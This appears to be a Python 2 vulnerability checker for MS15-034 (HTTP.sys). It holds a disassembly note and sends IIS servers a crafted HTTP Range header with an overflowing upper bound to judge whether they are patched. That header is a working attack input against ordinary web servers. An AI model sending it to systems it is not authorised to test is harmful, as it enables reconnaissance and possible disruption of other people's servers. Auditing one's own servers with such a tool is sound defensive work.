''' ___. .___ __ __ \_ |__ ____ ___.__. ____ ____ __| _// |________ __ __ _______/ |_ | __ \_/ __ < | |/ _ \ / \ / __ |\ __\_ __ \ | \/ ___/\ __\ | \_\ \ ___/\___ ( <_> ) | \/ /_/ | | | | | \/ | /\___ \ | | |___ /\___ > ____|\____/|___| /\____ | |__| |__| |____//____ > |__| \/ \/\/ \/ \/ \/ MS15-034 Checker Danger! This script has not been properly qa'd and will probably fail in terrible ways. It is based off a change in HTTP!UlpParseRange in which an error code is returned as a result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of an HTTP range request. -BF 8a8b2112 56 push esi 8a8b2113 6a00 push 0 8a8b2115 2bc7 sub eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca sbb ecx,edx 8a8b211b 51 push ecx 8a8b211c 50 push eax 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here ''' import socket import random ipAddr = "" hexAllFfff = "18446744073709551615" req1 = "GET / HTTP/1.0\r\n\r\n" req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" print "[*] Audit Started" client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req1) boringResp = client_socket.recv(1024) if "Microsoft" not in boringResp: print "[*] Not IIS" exit(0) client_socket.close() client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req) goodResp = client_socket.recv(1024) if "Requested Range Not Satisfiable" in goodResp: print "[!!] Looks VULN" elif " The request has an invalid header name" in goodResp: print "[*] Looks Patched" else: print "[*] Unexpected response, cannot discern patch status"